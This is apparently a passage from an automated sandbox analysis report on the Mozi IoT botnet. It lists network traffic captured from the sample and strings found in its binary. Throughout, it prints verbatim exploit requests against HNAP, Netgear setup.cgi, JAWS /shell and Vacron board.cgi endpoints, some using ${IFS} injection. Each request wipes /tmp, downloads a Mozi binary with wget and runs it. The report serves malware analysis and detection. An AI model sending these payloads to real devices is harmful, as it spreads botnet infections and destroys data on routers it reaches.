xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 46.254.184.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.208.233.170:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=2t0qh0ecr3aygl45zqhp5555; path=/
Set-Cookie: awstats=1; path=/
X-Powered-By: http://www.evoSuite.com
Date: Fri, 21 Jan 2022 03:35:26 GMT
Content-Length: 926
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Set-Cookie: CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000
Set-Cookie: LSKey-c$CookieConsentPolicy=0:0; domain=161.71.2.41; path=/; expires=Sat, 21-Jan-2023 03:32:59 GMT; Max-Age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: upgrade-insecure-requests
X-Robots-Tag: none
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Data Ascii: 7b4<table cellspacing=10><tr><td><span style="font-weight: bold;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2022 03:33:06 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 21 Jan 2022 03:33:06 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2022 03:33:27 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 292
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 92-118-26-58.hosts.mhosting.hu Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Content-Type: text/html; charset=UTF-8
Content-Length: 3368
Connection: close
P3P: CP="CAO PSA OUR"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: security_session_verify=25bea19ce72247a1479c870555f9acf3; expires=Mon, 24-Jan-22 11:33:39 GMT; path=/; HttpOnly
Date: Fri, 21 Jan 2022 03:33:38 GMT
Connection: close
Content-Length: 1163
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2022 03:33:48 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.2.20
Content-Length: 216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Cache-control:no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 21 Jan 2022 03:34:24 GMT
Server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 21 Jan 2022 03:34:54 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1566
Date: Fri, 21 Jan 2022 03:35:11 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Length: 14
Content-Type: text/plain
Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a
Data Ascii: 404 Not Found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2022 10:00:53 GMT
Server: web
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Content-Length: 166
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=60, max=99
Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 21 Jan 2022 03:35:50 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2022 03:35:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 271
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address></body></html>
Source: networks.30.dr String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.30.dr String found in binary or memory: http://%s:%d/Mozi.m
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://%s:%d/Mozi.m;
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://%s:%d/Mozi.m;$
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.30.dr String found in binary or memory: http://%s:%d/bin.sh
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.30.dr String found in binary or memory: http://127.0.0.1
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://127.0.0.1sendcmd
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://HTTP/1.1
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.30.dr String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.30.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.30.dr String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.30.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.30.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.30.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.30.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.30.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ZFvtIZszMd, networks.30.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.30.dr String found in binary or memory: http://www.pastebin.ca/upload.php
Source: motd-news.18.dr String found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation
Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0
Host: 64.34.159.178:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 187.157.44.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 161.71.2.41:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.8.220.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 52.232.110.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 83.142.198.185:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.12.89.25:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 184.25.176.127:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
